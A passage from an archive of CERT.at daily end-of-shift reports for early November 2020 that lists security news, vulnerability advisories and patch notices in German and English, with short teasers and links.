https://www.zdnet.com/article/npm-package-caught-stealing-sensitive-discord… ∗∗∗ IoT security is a mess. These guidelines could help fix that ∗∗∗ --------------------------------------------- New guidelines from ENISA recommend that all stages of the IoT device lifecycle need to be considered to help ensure devices are secure. --------------------------------------------- https://www.zdnet.com/article/iot-security-is-a-mess-these-guidelines-could… ===================== = Vulnerabilities = ===================== ∗∗∗ Sicherheitsupdate: Ultimate Member Plug-in gefährdet Wordpress-Seiten ∗∗∗ --------------------------------------------- Admin-Lücken im Plug-in Ultimate Member bedrohen über 100.000 Wordpress-Websites. Eine abgesicherte Version ist verfügbar. --------------------------------------------- https://heise.de/-4952685 ∗∗∗ Remote-Code-Execution-Lücke in Firefox, Firefox ESR und Thunderbird ∗∗∗ --------------------------------------------- Mozilla hat eine kritische Schwachstelle in seinen Webbrowsern und seinem Mail-Client geschlossen. --------------------------------------------- https://heise.de/-4953356 ∗∗∗ SAP Patchday November 2020 ∗∗∗ --------------------------------------------- Ein entfernter, authentisierter oder anonymer Angreifer kann mehrere Schwachstellen in SAP Produkten und Anwendungskomponenten ausnutzen, um die Vertraulichkeit, Verfügbarkeit und die Integrität der Anwendungen zu gefährden. --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1090 ∗∗∗ Security Bulletins Posted ∗∗∗ --------------------------------------------- Adobe has published security bulletins for Adobe Connect (APSB20-69) and Adobe Reader Mobile (APSB20-71). Adobe recommends users update their product installations to the latest versions using the instructions referenced in the relevant bulletin. This posting is provided "AS IS" with no warranties and confers no rights. --------------------------------------------- https://blogs.adobe.com/psirt/?p=1942 ∗∗∗ Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers Slow Path Forwarding Denial of Service Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in the ingress packet processing function of Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper resource allocation when an affected device processes network traffic in software switching mode (punted). --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ SSA-492828: Denial-of-Service Vulnerability in SIMATIC S7-300 CPUs and SINUMERIK Controller ∗∗∗ --------------------------------------------- A vulnerability in S7-300 might allow an attacker to cause a Denial-of-Service condition on port 102 of the affected devices by sending specially crafted packets. Siemens is preparing updates and recommends specific countermeasures until fixes are available. --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-492828.txt ∗∗∗ SSA-431802: Multiple Vulnerabilities in SCALANCE W1750D ∗∗∗ --------------------------------------------- Siemens SCALANCE W1750D is a brandlabled device. Aruba has released a related security advisory (ARUBA-PSA-2016-004) [0] disclosing vulnerabilities in its Aruba Instant product line. The advisory contains multiple related vulnerabilities that are summarized in CVE-2016-2031. --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-431802.txt ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (moin, obfs4proxy, tcpdump, and zeromq3), Fedora (samba), Mageia (lout, openldap, pacemaker, samba, sddm, and spice, spice-gtk), openSUSE (bluez, ImageMagick, java-1_8_0-openj9, otrs, and wireshark), Red Hat (bind, buildah, curl, fence-agents, kernel, kernel-rt, kpatch-patch, librepo, libvirt, podman, python, python3, qt and qt5-qtbase, resource-agents, skopeo, tomcat, and unixODBC), SUSE (gcc10, python3, SDL, and zeromq), and Ubuntu (libexif). --------------------------------------------- https://lwn.net/Articles/836770/ ∗∗∗ IPAS: Security Advisories for November 2020 ∗∗∗ --------------------------------------------- Hello, It’s the second Tuesday in November and today we are releasing 40 security advisories. If this seems like a large number of advisories for Intel to be releasing, you’re right. However, there are two primary reasons for this. First, as I mentioned in August, we are aligning public disclosures, as much as possible, to [...] --------------------------------------------- https://blogs.intel.com/technology/2020/11/ipas-security-advisories-for-nov… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 09.11.2020
by Daily end-of-shift report 09 Nov '20

09 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 06-11-2020 18:00 − Montag 09-11-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Hacker haben mehrfach Sourcecode aus SonarQube-Instanzen abgegriffen ∗∗∗ --------------------------------------------- Das FBI warnte bereits im Oktober vor einem Angriff auf Installationen unter anderem von US-Regierungsbehörden, aber auch privater Firmen. --------------------------------------------- https://heise.de/-4951630 ∗∗∗ Lets Encrypt: Alte Android-Geräte bekommen Probleme mit Millionen Seiten ∗∗∗ --------------------------------------------- Der Zertifikatswechsel bei Lets Encrypt sorgt für Probleme bei einem Drittel aller Android-Geräte. Die Lösung dafür ist der Firefox. --------------------------------------------- https://www.golem.de/news/let-s-encrypt-alte-android-geraete-bekommen-probl… ∗∗∗ New Pay2Key ransomware encrypts networks within one hour ∗∗∗ --------------------------------------------- A new ransomware called Pay2Key has been targeting organizations from Israel and Brazil, encrypting their networks within an hour in targeted attacks still under investigation. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-pay2key-ransomware-encry… ∗∗∗ How Ryuk Ransomware operators made $34 million from one victim ∗∗∗ --------------------------------------------- One hacker group that is targeting high-revenue companies with Ryuk ransomware received $34 million from one victim in exchange for the decryption key that unlocked their computers. --------------------------------------------- https://www.bleepingcomputer.com/news/security/how-ryuk-ransomware-operator… ∗∗∗ Gitpaste-12 Worm Targets Linux Servers, IoT Devices ∗∗∗ --------------------------------------------- The newly discovered malware uses GitHub and Pastebin to house component code, and harbors 12 different initial attack vectors. --------------------------------------------- https://threatpost.com/gitpaste-12-worm-linux-servers-iot-devices/161016/ ∗∗∗ Adventures in Anti-Gravity ∗∗∗ --------------------------------------------- Here we deconstruct a Mac variant of GravityRAT (the cross-platform spyware, known to target the Indian armed forces). --------------------------------------------- https://objective-see.com/blog/blog_0x5B.html ∗∗∗ Cryptojacking Targeting WebLogic TCP/7001, (Sat, Nov 7th) ∗∗∗ --------------------------------------------- This past week got some interesting logs targeting TCP/7001 (WebLogic CVE-2020-14882 - see previous diary[1][2]) looking to download and launch a shell script to install various cryptominer on the target. The shell script target SELINUX compatible hosts likely CentOS/RedHat, Ubuntu, etc to install various cryptominer applications. --------------------------------------------- https://isc.sans.edu/diary/rss/26768 ∗∗∗ How Attackers Brush Up Their Malicious Scripts, (Mon, Nov 9th) ∗∗∗ --------------------------------------------- On Friday, I received a bunch of alerts from one of my YARA hunting rules. Several samples were submitted from the same account (through the VT API), from the same country (US), and in a very short period of time. All the submitted files were OLE2 files containing a malicious macro. All of them had a low VT score so it deserved some investigations. I downloaded the samples and had a look at them. --------------------------------------------- https://isc.sans.edu/diary/rss/26770 ∗∗∗ When Threat Actors Fly Under the Radar: Vatet, PyXie and Defray777 ∗∗∗ --------------------------------------------- Vatet, PyXie and Defray777 are all associated with a financially motivated threat group. We aim to get these malware families on the radar. --------------------------------------------- https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/ ∗∗∗ xHunt Campaign: Newly Discovered Backdoors Using Deleted Email Drafts and DNS Tunneling for Command and Control ∗∗∗ --------------------------------------------- We observed evidence that the xHunt campaign used two backdoors on a compromised Microsoft Exchange Server at an organization in Kuwait. --------------------------------------------- https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/ ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco stopft schwerwiegende Lücke in Webex Meetings für Windows ∗∗∗ --------------------------------------------- Die Schwachstelle kommt bei internen Tests ans Licht. Ein lokaler Angreifer kann Schadcode ausführen. Weitere Schwachstellen stecken im Web Network Recording Player und Webex Player. --------------------------------------------- https://www.zdnet.de/88389577/cisco-stopft-schwerwiegende-luecke-in-webex-m… ∗∗∗ WordPress Sites Open to Code Injection Attacks via Welcart e-Commerce Bug ∗∗∗ --------------------------------------------- The shopping cart application contains a PHP object-injection bug. --------------------------------------------- https://threatpost.com/wordpress_open_to_attacks_welcart_bug/161037/ ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by CentOS (bind, firefox, java-1.8.0-openjdk, kernel, libX11, qemu-kvm, thunderbird, and xorg-x11-server), Debian (guacamole-server, krb5, libexif, poppler, raptor2, and sympa), Fedora (blueman, chromium, freetype, galera, krb5, libtpms, mariadb, mariadb-connector-c, pngcheck, and salt), Mageia (blueman, docker, fontforge, junit, libproxy, libuv, mariadb, suricata, and webmin), openSUSE (apache-commons-httpclient, bluez, gnome-settings-daemon, gnome-shell, [...] --------------------------------------------- https://lwn.net/Articles/836676/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 06.11.2020
by Daily end-of-shift report 06 Nov '20

06 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 05-11-2020 18:00 − Freitag 06-11-2020 18:00 Handler: Dimitri Robl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Reverse shell botnet Gitpaste-12 spreads via GitHub and Pastebin ∗∗∗ --------------------------------------------- A newly discovered worm and botnet named Gitpaste-12 lives on GitHub and also uses Pastebin to host malicious code. The advanced malware comes equipped with reverse shell and crypto mining capabilities. --------------------------------------------- https://www.bleepingcomputer.com/news/security/reverse-shell-botnet-gitpast… ∗∗∗ Sicherheitslücke: Admin-Passwort für Rettungsdienst-System ungeschützt im Netz ∗∗∗ --------------------------------------------- Über die Software Ivena werden Notfallpatienten in Krankenhäusern angemeldet. Ein Admin-Passwort ist nun öffentlich auf der Herstellerwebseite einsehbar gewesen. --------------------------------------------- https://www.golem.de/news/sicherheitsluecke-admin-passwort-fuer-rettungsdie… ∗∗∗ RansomEXX Trojan attacks Linux systems ∗∗∗ --------------------------------------------- We recently discovered a new file-encrypting Trojan built as an ELF executable and intended to encrypt data on machines controlled by Linux-based operating systems. --------------------------------------------- https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/ ∗∗∗ ALFA TEaM Shell ~ v4.1-Tesla: A Feature Update Analysis ∗∗∗ --------------------------------------------- We’ve seen a wider variety of PHP web shells being used by attackers this year — including a number of shells that have been significantly updated in an attempt to “improve” them. Depending on the scope of changes and feature enhancements that are added to an existing web shell’s source code, these updates can be tedious and time consuming for bad actors. For this reason, it’s common to see code for web shells reused among different, unaffiliated attackers. --------------------------------------------- https://blog.sucuri.net/2020/11/alfa-team-shell-v4-1-tesla-a-feature-update… ∗∗∗ Rediscovering Limitations of Stateful Firewalls: "NAT Slipstreaming" ? Implications, Detections and Mitigations ∗∗∗ --------------------------------------------- A recent {rediscovered} technique (NAT Slipstreaming) to allow an attacker remotely access any TCP/UDP service bound to a victim’s machine, thus bypassing the victim’s Network Address Translation (NAT)/firewall implementation was detailed by Samy Kamkar [1]. Samy had also shared a similar technique termed “NAT Pinning” back in 2010 [2]. The similarities in both techniques were convincing victims to access a specially crafted site implementing said techniques, resulting in [...] --------------------------------------------- https://isc.sans.edu/forums/diary/Rediscovering+Limitations+of+Stateful+Fir… ∗∗∗ Business VOIP phone systems are being hacked for profit worldwide. Is yours secure? ∗∗∗ --------------------------------------------- Security researchers have uncovered an organised gang of cybercriminals who are compromising the VOIP phone systems of over 1000 organisations worldwide. Check Point has identified a malicious campaign that has targeted a critical vulnerability in the Sangoma PBX open-source GUI, used to manage installations of Asterisk - the worlds most popular VOIP phone system for businesses. --------------------------------------------- https://businessinsights.bitdefender.com/business-voip-phone-systems-are-be… ∗∗∗ IntelMQ offers tutorial lessons and a new documentation page ∗∗∗ --------------------------------------------- The IntelMQ tutorial guiding through various features and tools of IntelMQ is available in the IntelMQ Tutorial GitHub repository. Lesson one introduces the architecture, concepts and terminology of the project. Lessons two and three delve hands-on into working with IntelMQ. Starting with installation and basic usage & configuration they go on to tackle progressively more advanced topics like using advanced features or changing the message queue software to be used. --------------------------------------------- https://cert.at/en/blog/2020/11/intelmq-tutorial-and-new-documentation-page ∗∗∗ Ryuk Speed Run, 2 Hours to Ransom ∗∗∗ --------------------------------------------- Since the end of September Ryuk has been screaming back into the news. We’ve already covered 2 cases in that timeframe. We’ve seen major healthcare providers, managed service providers, [...] --------------------------------------------- https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/ ===================== = Vulnerabilities = ===================== ∗∗∗ Schwachstellen in iOS werden aktiv ausgenutzt – kein Update für iOS 13 ∗∗∗ --------------------------------------------- Apple-Nutzer sollten ihr Betriebssystem zügig aktualisieren, kritische Lücken werden wohl für Angriffe verwendet. Nicht alle Systemversionen erhalten Updates. --------------------------------------------- https://heise.de/-4950496 ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (sddm and wordpress), Fedora (blueman, chromium, pngcheck, and salt), openSUSE (chromium, salt, tiff, tigervnc, tmux, tomcat, transfig, and xen), Oracle (freetype, kernel, libX11, thunderbird, and xorg-x11-server), SUSE (bluez, ImageMagick, java-1_8_0-openjdk, rmt-server, salt, and u-boot), and Ubuntu (dom4j, firefox, netqmail, phpldapadmin, and tmux). --------------------------------------------- https://lwn.net/Articles/836467/ ∗∗∗ Security Advisory - Netlogon Elevation of Privilege Vulnerability ∗∗∗ --------------------------------------------- https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201105… ∗∗∗ Digium Certified Asterisk: Mehrere Schwachstellen ermöglichen Denial of Service ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1084 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 05.11.2020
by Daily end-of-shift report 05 Nov '20

05 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 04-11-2020 18:00 − Donnerstag 05-11-2020 18:00 Handler: Dimitri Robl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Exploit für Cisco-VPN AnyConnect in Umlauf - Sicherheitsupdate steht noch aus ∗∗∗ --------------------------------------------- Attacken auf Ciscos VPN-Lösung AnyConnect könnten kurz bevor stehen. Bislang gibt es aber nur Patches für andere Lücken in IOS XR, Webwex & Co. --------------------------------------------- https://heise.de/-4948798 ∗∗∗ Attacks on industrial enterprises using RMS and TeamViewer: new data ∗∗∗ --------------------------------------------- In summer 2019, Kaspersky ICS CERT identified a new wave of phishing emails containing various malicious attachments. The emails target companies and organizations from different sectors of the economy that are associated with industrial production in one way or another. --------------------------------------------- https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-team… ∗∗∗ Did You Spot "Invoke-Expression"?, (Thu, Nov 5th) ∗∗∗ --------------------------------------------- When a PowerShell script is obfuscated, the deobfuscation process is, most of the time, performed through the Invoke-Expression cmdlet[1]. Invoke-Expression evaluates the string passed as an argument and returns the results of the commands inside the string. --------------------------------------------- https://isc.sans.edu/diary/rss/26762 ∗∗∗ Legacy Mauthtoken Malware Continues to Redirect Mobile Users ∗∗∗ --------------------------------------------- During malware analysis, we regularly find variations of this injected script on various compromised websites: . The variable “_0x446d” assigns hex encoded strings in different positions in the array. If we get the ASCII representation of the variable, we’ll end up with the following code: [...] --------------------------------------------- https://blog.sucuri.net/2020/11/legacy-mauthtoken-malware-continues-to-redi… ∗∗∗ BEC Scammers Exploit Flaw to Spoof Domains of Rackspace Customers ∗∗∗ --------------------------------------------- A threat actor specializing in business email compromise (BEC) attacks has been observed exploiting a vulnerability to spoof the domains of Rackspace customers as part of its operations. --------------------------------------------- https://www.securityweek.com/bec-scammers-exploit-flaw-spoof-domains-racksp… ===================== = Vulnerabilities = ===================== ∗∗∗ Sicherheitsupdates: BIG-IP Appliances und die Admin-Falle ∗∗∗ --------------------------------------------- Der Netzwerkausrüster F5 hat wichtige Patches zum Absichern verschiedener Appliances veröffentlicht. --------------------------------------------- https://heise.de/-4949448 ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (bouncycastle, gdm3, and libonig), Fedora (arpwatch, thunderbird, and trousers), openSUSE (chromium, gn), Red Hat (freetype, libX11, thunderbird, and xorg-x11-server), and SUSE (ImageMagick, java-11-openjdk, salt, and wireshark). --------------------------------------------- https://lwn.net/Articles/836238/ ∗∗∗ In Wild Critical Buffer Overflow Vulnerability in Solaris Can Allow Remote Takeover - CVE-2020-14871 ∗∗∗ --------------------------------------------- FireEye Mandiant has been investigating compromised Oracle Solaris machines in customer environments. During our investigations, we discovered an exploit tool on a customer’s system and analyzed it to see how it was attacking their Solaris environment. The FLARE team’s Offensive Task Force analyzed the exploit to determine how it worked, reproduced the vulnerability on different versions of Solaris, and then reported it to Oracle. In this blog post we present a description of the [...] --------------------------------------------- https://www.fireeye.com/blog/threat-research/2020/11/critical-buffer-overfl… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 04.11.2020
by Daily end-of-shift report 04 Nov '20

04 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 03-11-2020 18:00 − Mittwoch 04-11-2020 18:00 Handler: Dimitri Robl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ 49.500 Euro gewonnen? Vorsicht, BetrügerInnen geben sich am Telefon als EuroMillionen aus! ∗∗∗ --------------------------------------------- „Herzlichen Glückwünsch. Sie haben 49.500 Euro gewonnen“. BetrügerInnen rufen im Namen von EuroMillionen an und übermitteln ihren Opfern diese gute Nachricht. Doch tatsächlich handelt es sich um Vorschussbetrug: Bevor der Betrag überwiesen werden kann, müssen die vermeintlichen GewinnerInnen 1.500 Euro für eine Versicherung bezahlen. Der Gewinn wird trotzdem nicht überwiesen, die 1.500 Euro sind also verloren. --------------------------------------------- https://www.watchlist-internet.at/news/49500-euro-gewonnen-vorsicht-betrueg… ∗∗∗ Exchange-Lücke: Immer noch viele Server offen ∗∗∗ --------------------------------------------- Einen Monat nachdem heise Security über die dramatische Zahl an verwundbaren Systemen berichtete, hat sich die Situation zwar verbessert, aber nicht entspannt. --------------------------------------------- https://heise.de/-4947221 ∗∗∗ Google: Android-Lücke kann Geräte "dauerhaft" lahmlegen ∗∗∗ --------------------------------------------- Google schließt mit dem November-Update für Android mehrere kritische Sicherheitslücken. Geräte können lahmgelegt oder auch übernommen werden. --------------------------------------------- https://www.golem.de/news/google-android-luecke-kann-geraete-dauerhaft-lahm… ∗∗∗ New RegretLocker ransomware targets Windows virtual machines ∗∗∗ --------------------------------------------- A new ransomware called RegretLocker uses a variety of advanced features that allows it to encrypt virtual hard drives and close open files for encryption. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-regretlocker-ransomware-… ∗∗∗ Sneaky Office 365 phishing inverts images to evade detection ∗∗∗ --------------------------------------------- A creative Office 365 phishing campaign has been inverting images used as backgrounds for landing pages to avoid getting flagged as malicious by crawlers designed to spot phishing sites. --------------------------------------------- https://www.bleepingcomputer.com/news/security/sneaky-office-365-phishing-i… ∗∗∗ Attackers Exploiting WebLogic Servers via CVE-2020-14882 to install Cobalt Strike, (Tue, Nov 3rd) ∗∗∗ --------------------------------------------- Starting late last week, we observed a large number of scans against our WebLogic honeypots to detect if they are vulnerable to CVE-2020-14882. CVE-2020-14882 was patched about two weeks ago as part of Oracle's quarterly critical patch update. In addition to scans simply enumerating vulnerable servers, we saw a small number of scans starting on Friday (Oct. 30th) attempting to install crypto-mining tools [1]. --------------------------------------------- https://isc.sans.edu/diary/rss/26752 ===================== = Vulnerabilities = ===================== ∗∗∗ SaltStack: Security-Packages beseitigen drei teils kritische Sicherheitslücken ∗∗∗ --------------------------------------------- Für viele SaltStack-Versionen stehen Aktualisierungen bereit; die Entwickler raten angesichts der von drei Lücken ausgehenden Gefahren zum zeitnahen Update. --------------------------------------------- https://heise.de/-4947393 ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (chromium and firefox), Fedora (nss), openSUSE (pacemaker), Red Hat (bind, binutils, bluez, cloud-init, container-tools:rhel8, cryptsetup, cups, curl, cyrus-imapd, cyrus-sasl, dovecot, dpdk, edk2, evolution, expat, file-roller, fontforge, freeradius:3.0, freerdp and vinagre, freetype, frr, gd, glibc, GNOME, gnome-software and fwupd, gnupg2, grafana, httpd:2.4, idm:DL1 and idm:client, kernel, kernel-rt, libarchive, libexif, libgcrypt, libldb, [...] --------------------------------------------- https://lwn.net/Articles/836137/ ∗∗∗ Cisco Security Advisories ∗∗∗ --------------------------------------------- Cisco hat für mehrere Produkte insgesamt 35 Security Advisories mit folgenden Security Impact Ratings veröffentlicht: High: 12 Medium: 23 --------------------------------------------- https://tools.cisco.com/security/center/Search.x?publicationTypeIDs=1&first… ∗∗∗ Patch for Critical VMware ESXi Vulnerability Incomplete ∗∗∗ --------------------------------------------- VMware on Wednesday informed customers that it has released new patches for ESXi after learning that a fix made available last month for a critical vulnerability was incomplete. --------------------------------------------- https://www.securityweek.com/patch-critical-vmware-esxi-vulnerability-incom… ∗∗∗ Joomla Publisher V 3.0.19 Stored XSS ∗∗∗ --------------------------------------------- https://cxsecurity.com/issue/WLB-2020110017 ∗∗∗ Joomla JomSocial 4.7.6 Stored XSS ∗∗∗ --------------------------------------------- https://cxsecurity.com/issue/WLB-2020110016 ∗∗∗ Security Advisory - Insecure Encryption Algorithm Vulnerability in Some Huawei Products ∗∗∗ --------------------------------------------- https://www.huawei.com/en/psirt/security-advisories/2019/huawei-sa-20201104… ∗∗∗ Vulnerabilities in Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) ∗∗∗ --------------------------------------------- https://sec-consult.com/./en/blog/advisories/vulnerabilities-in-trend-micro… ∗∗∗ Red Hat Enterprise Linux: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1076 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 03.11.2020
by Daily end-of-shift report 03 Nov '20

03 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Montag 02-11-2020 18:00 − Dienstag 03-11-2020 18:00 Handler: Dimitri Robl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Emotet -> Qakbot -> more Emotet, (Tue, Nov 3rd) ∗∗∗ --------------------------------------------- On Friday 2020-10-30, I generated an Emotet infection in my lab and saw Qakbot as the follow-up malware. I let the activity run for a while, then another Emotet infection appeared on the same host after Qakbot started. --------------------------------------------- https://isc.sans.edu/diary/rss/26750 ∗∗∗ Live off the Land? How About Bringing Your Own Island? An Overview of UNC1945 ∗∗∗ --------------------------------------------- Through Mandiant investigation of intrusions between February 2018 and September 2020, the FLARE Advanced Practices team observed a group we track as UNC1945 compromise telecommunications companies and operate against a tailored set of targets within the financial and professional consulting industries by leveraging access to third-party networks (see this blog post for an in-depth description of “UNC” groups). UNC1945 targeted Oracle Solaris operating systems, utilized several [...] --------------------------------------------- https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-o… ∗∗∗ JavaScript-Paketmanager: Twilio-Brandjacking-Paket öffnet Hintertür ∗∗∗ --------------------------------------------- Vergangenes Wochenende haben Angreifer ein Paket namens twilio-npm veröffentlicht, das eine Reverse Shell auf dem Entwicklersystem startet. --------------------------------------------- https://heise.de/-4945861 ∗∗∗ Schubladen für Schwachstellen: Das CVE-System im Überblick ∗∗∗ --------------------------------------------- MITREs Common Vulnerabilities and Exposures System (CVE) ist der gängige Standard zur Verwaltung von Schwachstellen. Wir erklären, was es damit auf sich hat. --------------------------------------------- https://heise.de/-4940478 ∗∗∗ Hundewelpen im Internet kaufen? - Lieber nicht! ∗∗∗ --------------------------------------------- Bei der Recherche nach Züchtern im Internet, stoßen Sie möglicherweise auf Websites, die wunderschöne Rasse-Hundewelpen verkaufen - meist zu einem sehr günstigen Preis. TierliebhaberInnen werden vor allem mit liebevollen Fotos und Beschreibung verlockt, sich mit dem vermeintlichen Züchter in Verbindung zu setzen. Doch Vorsicht: Der Handel von Hunden und Katzen über das Internet ist in Österreich verboten. --------------------------------------------- https://www.watchlist-internet.at/news/hundewelpen-im-internet-kaufen-liebe… ∗∗∗ These software bugs are years old. But businesses still arent patching them ∗∗∗ --------------------------------------------- Many organisations still havent applied security patches issued years ago, putting them at risk from common cyber attacks. --------------------------------------------- https://www.zdnet.com/article/these-software-bugs-are-years-old-but-busines… ===================== = Vulnerabilities = ===================== ∗∗∗ Security Alert CVE-2020-14750 Released ∗∗∗ --------------------------------------------- Oracle has just released Security Alert CVE-2020-14750. This vulnerability affects a number of versions of Oracle WebLogic Server and has a CVSS Base Score of 9.8. WebLogic Server customers should refer to the Security Alert Advisory for information on affected versions and how to obtain the required patches. This vulnerability is related to CVE-2020-14882, which was addressed in the October 2020 Critical Patch Update. Vulnerability CVE-2020-14750 is remotely exploitable without authentication, [...] --------------------------------------------- https://blogs.oracle.com/security/security-alert-cve-2020-14750-released ∗∗∗ Security Updates Available for Adobe Acrobat and Reader (APSB20-67) ∗∗∗ --------------------------------------------- Adobe has published a security bulletin for Adobe Acrobat and Reader (APSB20-67). The updates referenced in the bulletin address critical, important and moderate vulnerabilities and Adobe recommends users update their product installations to the latest versions using the instructions referenced in the bulletin. --------------------------------------------- https://blogs.adobe.com/psirt/?p=1939 ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (blueman and wordpress), Fedora (fastd, kernel, and samba), Gentoo (bluez, fossil, kpmcore, libssh, and opendmarc), openSUSE (claws-mail and icinga2), and Ubuntu (blueman). --------------------------------------------- https://lwn.net/Articles/835952/ ∗∗∗ Googles Project Zero deckt Sicherheitslücke bei GitHub auf ∗∗∗ --------------------------------------------- Das Sicherheitsteam hat das Risiko der gefundenen Schwachstelle für Entwickler als hoch eingestuft. Eine schnelle Lösung des Problems gibt es bisher nicht. --------------------------------------------- https://heise.de/-4946535 ∗∗∗ Android Security Bulletin - November 2020 ∗∗∗ --------------------------------------------- [...] The most severe of these issues is a critical security vulnerability in the System component that could enable a proximal attacker using a specially crafted transmission to execute arbitrary code within the context of a privileged process. --------------------------------------------- https://source.android.com/security/bulletin/2020-11-01 ∗∗∗ Google Patches Actively Exploited Chrome Vulnerabilities ∗∗∗ --------------------------------------------- Google has released updates to address multiple vulnerabilities in the Chrome browser, including two that are actively exploited in attacks. Chrome 86.0.4240.183 for Windows, macOS, and Linux was pushed to the stable channel with patches for a total of seven vulnerabilities, all of which feature a severity rating of high. --------------------------------------------- https://www.securityweek.com/google-patches-actively-exploited-chrome-vulne… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 02.11.2020
by Daily end-of-shift report 02 Nov '20

02 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 30-10-2020 18:00 − Montag 02-11-2020 18:00 Handler: Dimitri Robl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Sicherheitslücke: Zero Day im Windows-Kernel veröffentlicht ∗∗∗ --------------------------------------------- Google hat die Sicherheitslücke nach nur 7 Tagen veröffentlicht, weil sie bereits aktiv ausgenutzt wurde. Patches gibt es nicht. --------------------------------------------- https://www.golem.de/news/sicherheitsluecke-zero-day-im-windows-kernel-vero… ∗∗∗ More File Selection Gaffes, (Sat, Oct 31st) ∗∗∗ --------------------------------------------- A reader submitted a file, that turned out to be a mass mailer project file used by malicious actors. --------------------------------------------- https://isc.sans.edu/diary/rss/26722 ∗∗∗ CSS-JS Steganography in Fake Flash Player Update Malware ∗∗∗ --------------------------------------------- This summer, MalwareBytes researcher Jérôme Segura wrote an article about how criminals use image files (.ico) to hide JavaScript credit card stealers on compromised e-commerce sites. In a tweet, Affable Kraut also reported another similar obfuscation technique using .ico files to conceal JavaScript skimmers. Just something I’ve noticed more recently with digital skimmers/#magecart. --------------------------------------------- https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-u… ∗∗∗ How to Protect Yourself From Pwned and Password Reuse Attacks ∗∗∗ --------------------------------------------- Many businesses are currently looking at how to bolster security across their organization as the pandemic and remote work situation continues to progress towards the end of the year. As organizations continue to implement security measures to protect business-critical data, there is an extremely important area of security that often gets overlooked - passwords. --------------------------------------------- https://thehackernews.com/2020/11/how-to-protect-yourself-from-pwned-and.ht… ∗∗∗ NAT Slipstreaming ∗∗∗ --------------------------------------------- NAT Slipstreaming allows an attacker to remotely access any TCP/UDP service bound to a victim machine, bypassing the victims NAT/firewall (arbitrary firewall pinhole control), just by the victim visiting a website. --------------------------------------------- https://samy.pl/slipstream/ ∗∗∗ Ransomware Protection and Containment Strategies: Practical Guidance forEndpoint Protection, Hardening, and Containment ∗∗∗ --------------------------------------------- UPDATE (Oct. 30, 2020): We have updated the report to include additional protection and containment strategies based on front-line visibility and response efforts in combating ransomware. While the full scope of recommendations included within the initial report remain unchanged, the following strategies have been added into the report: [...] --------------------------------------------- https://www.fireeye.com/blog/threat-research/2019/09/ransomware-protection-… ∗∗∗ Cisco Talos Advisory on Adversaries Targeting the Healthcare and Public Health Sector ∗∗∗ --------------------------------------------- Cisco Talos has become aware that an adversary is leveraging Trickbot banking trojan and Ryuk ransomware to target U.S. hospitals and healthcare providers at an increasing rate. Security journalists reported on October 28, 2020 that the adversary was preparing to encrypt systems at “potentially hundreds” of medical centers and hospitals, based on a tip from a researcher who had been monitoring communications for the threat actor. --------------------------------------------- https://blog.talosintelligence.com/2020/10/healthcare-advisory.html ∗∗∗ RiskIQ Has Released Its Corpus of Infrastructure and IOCs Related to Ryuk Ransomware ∗∗∗ --------------------------------------------- Ryuk Ransomware has flooded US hospitals, threatening to shut down their operations when theyre needed most. Ryuk now accounts for a third of all ransomware attacks in 2020, with its operators finding success while many healthcare organizations are most vulnerable. However, the 